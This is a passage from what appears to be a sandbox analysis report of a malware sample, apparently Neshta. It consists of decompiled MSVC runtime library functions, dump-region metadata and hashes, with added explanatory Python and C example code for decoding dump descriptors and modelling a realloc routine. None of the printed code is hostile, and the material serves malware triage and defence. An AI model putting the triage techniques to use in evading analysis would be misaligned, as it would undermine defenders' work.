                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00DF283F
                                                                          • __mtinitlocks.LIBCMT ref: 00DF1922
                                                                            • Part of subcall function 00DF2DBC: InitializeCriticalSectionAndSpinCount.KERNEL32(00DFF060,00000FA0,?,?,00DF1927,00DF12CF,00DFD6E0,00000014), ref: 00DF2DDA
                                                                          • __mtterm.LIBCMT ref: 00DF192B
                                                                            • Part of subcall function 00DF1993: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00DF1930,00DF12CF,00DFD6E0,00000014), ref: 00DF2CD8
                                                                            • Part of subcall function 00DF1993: _free.LIBCMT ref: 00DF2CDF
                                                                            • Part of subcall function 00DF1993: DeleteCriticalSection.KERNEL32(00DFF060,?,?,00DF1930,00DF12CF,00DFD6E0,00000014), ref: 00DF2D01
                                                                          • __calloc_crt.LIBCMT ref: 00DF1950
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00DF1979
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentEncodeHandleInitializeModulePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                          • String ID:
                                                                          • API String ID: 2930087205-0
                                                                          • Opcode ID: 7fad517a97517468fa20d964c8528ff776e144c71fe47aaa831e576d8cae33ab
                                                                          • Instruction ID: 6d63908449a01298808b7aeba1434c350e9d6136c7c251cc745fed5945ae554a
                                                                          • Opcode Fuzzy Hash: 7fad517a97517468fa20d964c8528ff776e144c71fe47aaa831e576d8cae33ab
                                                                          • Instruction Fuzzy Hash: E4F0F03A11A3199DE3243B747C22B7A27C0DF01770B2BC62AF769D41D2EE50888148F4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
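
The "Memory Dump Source" entries above name the dumped regions only by a dotted file name. The following is an added example, not part of the report or of Joe Sandbox, that decodes those names into base address, page protection and allocation type so that writable-and-executable regions (the usual home of unpacked code) can be picked out of a long dump list. The field layout (process index, dump index, dump id, base address, protection, type) is an assumption inferred from the ordering seen in these names, not a published specification; the PAGE_* and MEM_* constants are the standard Windows values from winnt.h. The sample input is the descriptor list copied from this report.

```python
"""Decode Joe Sandbox memory-dump descriptors such as
00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp
into base address, page protection and allocation type (example code)."""
import re
from dataclasses import dataclass

# Windows memory-protection constants (winnt.h, exact values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # any PAGE_EXECUTE* protection
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80     # any writable protection

# ASSUMED field layout, inferred from the names in this report (not a documented format):
#   <process idx>.<dump idx>.<dump id>.<base address>.<protection>.<type>.sdmp
DESCRIPTOR_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<dump>\d{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    dump_index: int
    dump_id: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        base = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")
        mods = [name for bit, name in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([base] + mods)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_descriptor(name: str) -> DumpRegion:
    """Parse one .sdmp file name; raises ValueError if it does not fit the assumed layout."""
    m = DESCRIPTOR_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a dump descriptor: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"]), dump_index=int(m["dump"]), dump_id=int(m["id"]),
        base=int(m["base"], 16), protect=int(m["prot"], 16), mem_type=int(m["type"], 16),
    )


def parse_report_lines(lines):
    """Pull every .sdmp descriptor out of 'Source File:' / 'Associated:' report lines."""
    regions = []
    for line in lines:
        for tok in line.replace("•", " ").split():
            tok = tok.rstrip(",;")
            if tok.endswith(".sdmp"):
                regions.append(parse_descriptor(tok))
    return regions


def rwx_regions(regions):
    """Regions that are both writable and executable: first stop when hunting unpacked code."""
    return [r for r in regions if r.executable and r.writable]


def describe(r: DumpRegion) -> str:
    return f"0x{r.base:016x}  {r.protect_name:<24} {r.type_name}"


# Constructed sample: the descriptor list from this report's "Memory Dump Source" block.
REPORT_LINES = [
    "• Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true",
    "• Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp",
    "• Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp",
    "• Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp",
    "• Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp",
    "• Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp",
    "• Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    regions = parse_report_lines(REPORT_LINES)
    for region in sorted(regions, key=lambda r: r.base):
        print(describe(region))
    print("RWX regions:", [hex(r.base) for r in rwx_regions(regions)] or "none")
```

Run against the list above, the code region at 0xDF1000 decodes to PAGE_EXECUTE_READ, the region at 0xDFF000 to PAGE_READWRITE, and none of the seven is writable and executable at the same time. If the last field is indeed the allocation type, every region here is MEM_PRIVATE rather than MEM_IMAGE, which is worth a second look for a dump the report marks "based on PE: true".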

                                                                          C-Code - Quality: 100%
                                                                          			// Decompiler output. The shape (locale update, lead-byte test, then
                                                                          			// MultiByteToWideChar on a single byte with errno set on failure) matches
                                                                          			// the MSVC CRT _mbtowc_l(wchar_t *pwc, const char *s, size_t n, _locale_t);
                                                                          			// the constant 9 is MB_PRECOMPOSED | MB_ERR_INVALID_CHARS and 0x2a is
                                                                          			// EILSEQ (42). CRT boilerplate; symbol names in the comments are
                                                                          			// identifications from the CRT source, not from the report.
                                                                          			E00DF6F42(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				char _v8;
                                                                          				intOrPtr _v12;
                                                                          				int _v20;
                                                                          				int _t35;
                                                                          				int _t38;
                                                                          				intOrPtr* _t44;
                                                                          				int _t47;
                                                                          				short* _t49;
                                                                          				intOrPtr _t50;
                                                                          				intOrPtr _t54;
                                                                          				int _t55;
                                                                          				int _t59;
                                                                          				char* _t62;
                                                                          
                                                                          				_t62 = _a8;                               // s
                                                                          				if(_t62 == 0) {
                                                                          					L5:
                                                                          					return 0;
                                                                          				}
                                                                          				_t50 = _a12;                              // n
                                                                          				if(_t50 == 0) {
                                                                          					goto L5;
                                                                          				}
                                                                          				if( *_t62 != 0) {
                                                                          					E00DF3287( &_v20, _a16);              // _LocaleUpdate(plocinfo)
                                                                          					_t35 = _v20;
                                                                          					__eflags =  *(_t35 + 0xa8);           // locinfo->locale_name[LC_CTYPE] in the CRT source
                                                                          					if( *(_t35 + 0xa8) != 0) {
                                                                          						_t38 = E00DF6E8A( *_t62 & 0x000000ff,  &_v20);   // _isleadbyte_l
                                                                          						__eflags = _t38;
                                                                          						if(_t38 == 0) {
                                                                          							__eflags = _a4;
                                                                          							_t59 = 1;
                                                                          							// MultiByteToWideChar(locinfo->lc_codepage, MB_PRECOMPOSED|MB_ERR_INVALID_CHARS,
                                                                          							//                     s, 1, pwc, pwc ? 1 : 0)
                                                                          							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                          							if(__eflags != 0) {
                                                                          								L21:
                                                                          								__eflags = _v8;
                                                                          								if(_v8 != 0) {           // ~_LocaleUpdate: clear the per-thread locale bit
                                                                          									_t54 = _v12;
                                                                          									_t31 = _t54 + 0x70;
                                                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                          									__eflags =  *_t31;
                                                                          								}
                                                                          								return _t59;         // 1 on success, -1 on invalid sequence
                                                                          							}
                                                                          							L20:
                                                                          							_t44 = E00DF3BBE(__eflags);   // _errno()
                                                                          							_t59 = _t59 | 0xffffffff;
                                                                          							__eflags = _t59;
                                                                          							 *_t44 = 0x2a;                // errno = EILSEQ
                                                                          							goto L21;
                                                                          						}
                                                                          						_t59 = _v20;                      // lead-byte path; listing is truncated here in the report
                                                                          						__eflags =  *(_t59 + 0x74) - 1;
                                                                          						if( *(_t59 + 0x74) <= 1) {
                                                                          							L15:
                                                                          							__eflags = _t50 -  *(_t59 + 0x74);
                                                                          							L16:
                                                                          							if(__eflags < 0) {
                                                                          								goto L20;
                                                                          							}
                                                                          							__eflags = _t62[1];
                                                                          							if(__eflags == 0) {
                                                                          								goto L20;
                                                                          							}
                                                                          							L18:
                                                                          							_t59 =  *(_t59 + 0x74);
                                                                          							goto L21;
                                                                          						}
                                                                          						__eflags = _t50 -  *(_t59 + 0x74);
                                                                          						if(__eflags < 0) {
                                                                          							goto L16;
                                                                          						}
                                                                          						__eflags = _a4;
                                                                          						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                          						_t59 = _v20;
                                                                          						__eflags = _t47;
                                                                          						if(_t47 != 0) {
                                                                          							goto L18;
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          					_t55 = _a4;
                                                                          					__eflags = _t55;
                                                                          					if(_t55 != 0) {
                                                                          						 *_t55 =  *_t62 & 0x000000ff;
                                                                          					}
                                                                          					_t59 = 1;
                                                                          					goto L21;
                                                                          				}
                                                                          				_t49 = _a4;
                                                                          				if(_t49 != 0) {
                                                                          					 *_t49 = 0;
                                                                          				}
                                                                          				goto L5;
                                                                          			}

                                                                          Instruction addresses for the listing above (the report's side column, one entry per decompiled line in order; 0x00000000 where the line carries no address):
                                                                          0x00df6f4a 0x00df6f4f 0x00df6f69 0x00000000 0x00df6f69 0x00df6f51 0x00df6f56 0x00000000
                                                                          0x00000000 0x00df6f5b 0x00df6f76 0x00df6f7b 0x00df6f7e 0x00df6f85 0x00df6fa4 0x00df6fab
                                                                          0x00df6fad 0x00df6ff1 0x00df6ff9 0x00df700e 0x00df7010 0x00df7020 0x00df7020 0x00df7024
                                                                          0x00df7026 0x00df7029 0x00df7029 0x00df7029 0x00df7029 0x00000000 0x00df702f 0x00df7012
                                                                          0x00df7012 0x00df7017 0x00df7017 0x00df701a 0x00000000 0x00df701a 0x00df6faf 0x00df6fb2
                                                                          0x00df6fb6 0x00df6fdf 0x00df6fdf 0x00df6fe2 0x00df6fe2 0x00000000 0x00000000 0x00df6fe4
                                                                          0x00df6fe8 0x00000000 0x00000000 0x00df6fea 0x00df6fea 0x00000000 0x00df6fea 0x00df6fb8
                                                                          0x00df6fbb 0x00000000 0x00000000 0x00df6fbf 0x00df6fd2 0x00df6fd8 0x00df6fdb 0x00df6fdd
                                                                          0x00000000 0x00000000 0x00000000 0x00df6fdd 0x00df6f87 0x00df6f8a 0x00df6f8c 0x00df6f91
                                                                          0x00df6f91 0x00df6f96 0x00000000 0x00df6f96 0x00df6f5d 0x00df6f62 0x00df6f66 0x00df6f66
                                                                          0x00000000

                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DF6F76
                                                                          • __isleadbyte_l.LIBCMT ref: 00DF6FA4
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00DF6FD2
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00DF7008
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: 03012b293263de87553c2e4ecabdc45298ee65cfb66bf6d954491c40607b2445
                                                                          • Instruction ID: 892f70d334eba4815cc2bfd63a52f91fa8f797c4e394bf837fa56dab073cfec5
                                                                          • Opcode Fuzzy Hash: 03012b293263de87553c2e4ecabdc45298ee65cfb66bf6d954491c40607b2445
                                                                          • Instruction Fuzzy Hash: 5831903160425AAFDB218F75D845BBA7BB5FF41310F1AC429FA5087591EB31E850DB70
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E00DF4998(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                                          				/* Matches the MSVC CRT _realloc(block = _a4, size = _a8): _free and RtlAllocateHeap appear in the APIs list.
                                                                          				   *0xe00790 is read as _crtheap, *0xe00b68 as _newmode, 0xffffffe0 as _HEAP_MAXREQ and 0xc as ENOMEM
                                                                          				   (assumed names). Library code, not sample logic. */
                                                                          				void* _t7;
                                                                          				long _t8;
                                                                          				intOrPtr* _t9;
                                                                          				intOrPtr* _t12;
                                                                          				long _t20;
                                                                          				long _t31;

                                                                          				if(_a4 != 0) {
                                                                          					_t31 = _a8;
                                                                          					__eflags = _t31;
                                                                          					if(_t31 != 0) {
                                                                          						_push(__ebx);
                                                                          						while(1) {
                                                                          							__eflags = _t31 - 0xffffffe0;     /* size > _HEAP_MAXREQ: refuse without touching the heap */
                                                                          							if(_t31 > 0xffffffe0) {
                                                                          								break;
                                                                          							}
                                                                          							__eflags = _t31;
                                                                          							if(_t31 == 0) {                   /* unreachable here (size 0 handled below); kept from the source */
                                                                          								_t31 = _t31 + 1;
                                                                          								__eflags = _t31;
                                                                          							}
                                                                          							_t7 = HeapReAlloc( *0xe00790, 0, _a4, _t31);   /* HeapReAlloc(_crtheap, 0, block, size) */
                                                                          							_t20 = _t7;
                                                                          							__eflags = _t20;
                                                                          							if(_t20 != 0) {
                                                                          								L17:
                                                                          								_t8 = _t20;                   /* success: return the (possibly moved) block */
                                                                          							} else {
                                                                          								__eflags =  *0xe00b68 - _t7;  /* _newmode == 0: no new handler, map GetLastError to errno */
                                                                          								if(__eflags == 0) {
                                                                          									_t9 = E00DF3BBE(__eflags);    /* _errno() */
                                                                          									 *_t9 = E00DF3BD1(GetLastError());   /* _get_errno_from_oserr */
                                                                          									goto L17;                 /* _t20 is 0 here, so this returns NULL */
                                                                          								} else {
                                                                          									__eflags = E00DF3EBA(_t7, _t31);   /* _callnewh(size) */
                                                                          									if(__eflags == 0) {
                                                                          										_t12 = E00DF3BBE(__eflags);
                                                                          										 *_t12 = E00DF3BD1(GetLastError());
                                                                          										L12:
                                                                          										_t8 = 0;
                                                                          										__eflags = 0;
                                                                          									} else {
                                                                          										continue;             /* handler released memory: retry HeapReAlloc */
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							goto L14;
                                                                          						}
                                                                          						E00DF3EBA(_t6, _t31);                 /* oversize: _callnewh(size), then errno = ENOMEM, return NULL */
                                                                          						 *((intOrPtr*)(E00DF3BBE(__eflags))) = 0xc;
                                                                          						goto L12;
                                                                          					} else {
                                                                          						E00DF2E06(_a4);                       /* size == 0: _free(block) and return NULL */
                                                                          						_t8 = 0;
                                                                          					}
                                                                          					L14:
                                                                          					return _t8;
                                                                          				} else {
                                                                          					return E00DF4906(__ebx, __edx, __edi, _a8);   /* block == NULL: malloc(size) */
                                                                          				}
                                                                          			}

                                                                          Instruction addresses for the listing above (the report's side column, one entry per decompiled line in order; 0x00000000 where the line carries no address):
                                                                          0x00df499f 0x00df49ad 0x00df49b0 0x00df49b2 0x00df49c1 0x00df49f4 0x00df49f4 0x00df49f7
                                                                          0x00000000 0x00000000 0x00df49c4 0x00df49c6 0x00df49c8 0x00df49c8 0x00df49c8 0x00df49d5
                                                                          0x00df49db 0x00df49dd 0x00df49df 0x00df4a3f 0x00df4a3f 0x00df49e1 0x00df49e1 0x00df49e7
                                                                          0x00df4a29 0x00df4a3d 0x00000000 0x00df49e9 0x00df49f0 0x00df49f2 0x00df4a11 0x00df4a25
                                                                          0x00df4a0b 0x00df4a0b 0x00df4a0b 0x00000000 0x00000000 0x00000000 0x00df49f2 0x00df49e7
                                                                          0x00000000 0x00df4a0d 0x00df49fa 0x00df4a05 0x00000000 0x00df49b4 0x00df49b7 0x00df49bd
                                                                          0x00df49bd 0x00df4a0e 0x00df4a10 0x00df49a1 0x00df49ab 0x00df49ab

                                                                          APIs
                                                                          • _free.LIBCMT ref: 00DF49B7
                                                                            • Part of subcall function 00DF4906: __FF_MSGBANNER.LIBCMT ref: 00DF491D
                                                                            • Part of subcall function 00DF4906: __NMSG_WRITE.LIBCMT ref: 00DF4924
                                                                            • Part of subcall function 00DF4906: RtlAllocateHeap.NTDLL(017C0000,00000000,00000001,00000000,00000000,00000000,?,00DF2E9E,00000000,00000000,00000000,00000000,?,00DF2D56,00000018,00DFD7D0), ref: 00DF4949
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 69befba40fd5a4cc269f76ed599bc0b0606acb67404266d2a3d0ff8b598c9655
                                                                          • Instruction ID: b292ce37ebf00598c8345d8d7632bd585dba6a3393913c69e219bdd8b3262401
                                                                          • Opcode Fuzzy Hash: 69befba40fd5a4cc269f76ed599bc0b0606acb67404266d2a3d0ff8b598c9655
                                                                          • Instruction Fuzzy Hash: 3811A332A4421EAECB212F74EC1567B3794EF04364B17C529FB489A251DF75C9808AB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
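The realloc-style routine E00DF4998 above is worth reading once in clean form, because its decision tree (NULL block, zero size, oversize request, heap failure with and without a new handler) is what an analyst has to recognise to dismiss it as CRT library code rather than sample logic. The block below is an added example written for this page; it is not the sample's code and not the CRT source. It is a portable model of that control flow: libc realloc stands in for HeapReAlloc, and the CRT globals read at 0xe00790 (_crtheap) and 0xe00b68 (_newmode) plus the _callnewh hook are modelled as plain variables with assumed names. The constants come from the listing itself: 0xffffffe0 as the maximum request and 0xc (ENOMEM) as the error code. The heap primitive is injectable so the failure path can be exercised deterministically.

```c
/* Added example: portable model of E00DF4998 (realloc-style CRT routine).
 * Not the sample's code. Win32 heap calls are replaced by libc; the CRT
 * globals and the new-handler hook are plain variables (assumed names).
 */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define CRT_HEAP_MAXREQ 0xffffffe0UL   /* the 'cmp esi, 0xffffffe0' bound seen in the listing */

static int crt_newmode = 0;                                   /* models *0xe00b68 */
static int (*crt_new_handler)(size_t) = NULL;                 /* handler that _callnewh would invoke */
static void *(*heap_realloc_impl)(void *, size_t) = realloc;  /* models HeapReAlloc(_crtheap, 0, ...) */

/* Model of _callnewh: nonzero means a handler ran and the request should be retried. */
static int call_new_handler(size_t size)
{
    return crt_new_handler != NULL ? crt_new_handler(size) : 0;
}

/* Same decision tree as the decompiled E00DF4998. */
void *crt_realloc_model(void *block, size_t newsize)
{
    if (block == NULL)                        /* block == NULL: behaves like malloc */
        return malloc(newsize ? newsize : 1); /* CRT malloc(0) hands out a 1-byte block */
    if (newsize == 0) {                       /* size == 0: release the block, return NULL */
        free(block);
        return NULL;
    }
    for (;;) {
        if (newsize > CRT_HEAP_MAXREQ) {      /* oversize: _callnewh, errno = ENOMEM, NULL; heap untouched */
            call_new_handler(newsize);
            errno = ENOMEM;
            return NULL;
        }
        void *p = heap_realloc_impl(block, newsize);
        if (p != NULL)
            return p;
        if (crt_newmode == 0) {               /* no new handler: map the OS error and fail */
            errno = ENOMEM;                   /* stands in for _get_errno_from_oserr(GetLastError()) */
            return NULL;
        }
        if (!call_new_handler(newsize)) {     /* handler declined: fail */
            errno = ENOMEM;
            return NULL;
        }
        /* handler claims it released memory: retry the heap call */
    }
}

/* --- checks exercising each path; all inputs are constructed here --- */

static void *always_fail_realloc(void *p, size_t n) { (void)p; (void)n; return NULL; }
static int handler_calls = 0;
static int retry_once_handler(size_t n) { (void)n; return ++handler_calls == 1; }

/* Zero-size request: the old block is freed and the caller receives NULL. */
int check_zero_size_frees(void)
{
    void *p = malloc(16);
    return p != NULL && crt_realloc_model(p, 0) == NULL;
}

/* Oversize request: rejected before the heap is touched; errno == ENOMEM; the block stays valid. */
int check_oversize_sets_enomem(void)
{
    void *p = malloc(16);
    errno = 0;
    void *r = crt_realloc_model(p, (size_t)CRT_HEAP_MAXREQ + 1);
    int ok = (r == NULL && errno == ENOMEM);
    free(p);
    return ok;
}

/* Heap failure with _newmode set: handler consulted, one retry, then failure. Returns the handler call count. */
int check_new_handler_retry(void)
{
    void *p = malloc(16);
    heap_realloc_impl = always_fail_realloc;
    crt_newmode = 1;
    crt_new_handler = retry_once_handler;
    handler_calls = 0;
    void *r = crt_realloc_model(p, 64);
    heap_realloc_impl = realloc;              /* restore the defaults */
    crt_newmode = 0;
    crt_new_handler = NULL;
    free(p);
    return r == NULL ? handler_calls : -1;
}

int main(void)
{
    printf("zero-size request frees and returns NULL: %d\n", check_zero_size_frees());
    printf("oversize request sets ENOMEM: %d\n", check_oversize_sets_enomem());
    printf("new-handler retries before failing: %d\n", check_new_handler_retry());
    return 0;
}
```

Two points from the model matter when triaging: the zero-size path frees the block and returns NULL, so a caller that treats NULL as "allocation failed, keep using the old pointer" has a use-after-free; and the 0xffffffe0 bound is the CRT keeping the heap's rounding and header arithmetic from wrapping, not a sample-specific check. Both are standard CRT behaviour and do not indicate anything about the Neshta logic elsewhere in this report.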

                                                                          C-Code - Quality: 20%
                                                                          			E00DF7A60(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                          				void* __edi;
                                                                          				void* __ebp;
                                                                          				void* _t25;
                                                                          				void* _t28;
                                                                          				intOrPtr _t29;
                                                                          				void* _t30;
                                                                          				intOrPtr* _t31;
                                                                          				void* _t33;
                                                                          
                                                                          				_t30 = __esi;
                                                                          				_t27 = __ebx;
                                                                          				_t35 = _a28;
                                                                          				_t29 = _a8;
                                                                          				if(_a28 != 0) {
                                                                          					_push(_a28);
                                                                          					_push(_a24);
                                                                          					_push(_t29);
                                                                          					_push(_a4);
                                                                          					E00DF8088(__ebx, _t29, __esi, _t35);
                                                                          					_t33 = _t33 + 0x10;
                                                                          				}
                                                                          				_t36 = _a40;
                                                                          				_push(_a4);
                                                                          				if(_a40 != 0) {
                                                                          					_push(_a40);
                                                                          				} else {
                                                                          					_push(_t29);
                                                                          				}
                                                                          				E00DF75F7(_t28);
                                                                          				_push(_t30);
                                                                          				_t31 = _a32;
                                                                          				_push( *_t31);
                                                                          				_push(_a20);
                                                                          				_push(_a16);
                                                                          				_push(_t29);
                                                                          				E00DF82E9(_t27, _t31, _t36);
                                                                          				_push(0x100);
                                                                          				_push(_a36);
                                                                          				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                                                                          				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                                          				_push(_a20);
                                                                          				_push(_a12);
                                                                          				_push(_t29);
                                                                          				_push(_a4);
                                                                          				_t25 = E00DF7852(_t27, _t29, _t31, _t36);
                                                                          				if(_t25 != 0) {
                                                                          					E00DF75C7(_t25, _t29);
                                                                          					return _t25;
                                                                          				}
                                                                          				return _t25;
                                                                          			}











                                                                          Listing address range: 0x00df7a60 - 0x00df7ada

                                                                          APIs
                                                                          • ___BuildCatchObject.LIBCMT ref: 00DF7A77
                                                                            • Part of subcall function 00DF8088: ___AdjustPointer.LIBCMT ref: 00DF80D1
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00DF7A8E
                                                                          • ___FrameUnwindToState.LIBCMT ref: 00DF7AA0
                                                                          • CallCatchBlock.LIBCMT ref: 00DF7AC4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                          • String ID:
                                                                          • API String ID: 2633735394-0
                                                                          • Opcode ID: 5a2de6d7f914b26d8ecfc251db98e636c73078df35101615ef05083113ff3421
                                                                          • Instruction ID: 30a75142f4c0b0c940444d65bbf0914062f769d1e2c684874d778e80f8c6a48c
                                                                          • Opcode Fuzzy Hash: 5a2de6d7f914b26d8ecfc251db98e636c73078df35101615ef05083113ff3421
                                                                          • Instruction Fuzzy Hash: 1E01133200410DBBCF129FA5CC05EEE3BAAEF48754F168115FA1862120C732E9A1EBB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 92%
                                                                          			// CRT locale bookkeeping, not sample logic: under __lock(0xd) the thread's locale-info pointer (+0x68) is swapped for the global one at 0xdff3b0 with Interlocked reference counting; the old block is freed unless it is the static one at 0xdff6b0, and a NULL result is routed to E00DF19F8 with code 0x20.
                                                                          			E00DF35AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                          				LONG* _t20;
                                                                          				signed int _t25;
                                                                          				void* _t29;
                                                                          				void* _t31;
                                                                          				LONG* _t33;
                                                                          				void* _t34;
                                                                          
                                                                          				_t29 = __edx;
                                                                          				_t24 = __ebx;
                                                                          				_push(0xc);
                                                                          				_push(0xdfd810);
                                                                          				E00DF2A00(__ebx, __edi, __esi);
                                                                          				_t31 = E00DF17E3();
                                                                          				_t25 =  *0xdffcf4; // 0xfffffffe
                                                                          				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                          					E00DF2C8D(0xd);
                                                                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                          					_t33 =  *(_t31 + 0x68);
                                                                          					 *(_t34 - 0x1c) = _t33;
                                                                          					__eflags = _t33 -  *0xdff3b0; // 0x17dc460
                                                                          					if(__eflags != 0) {
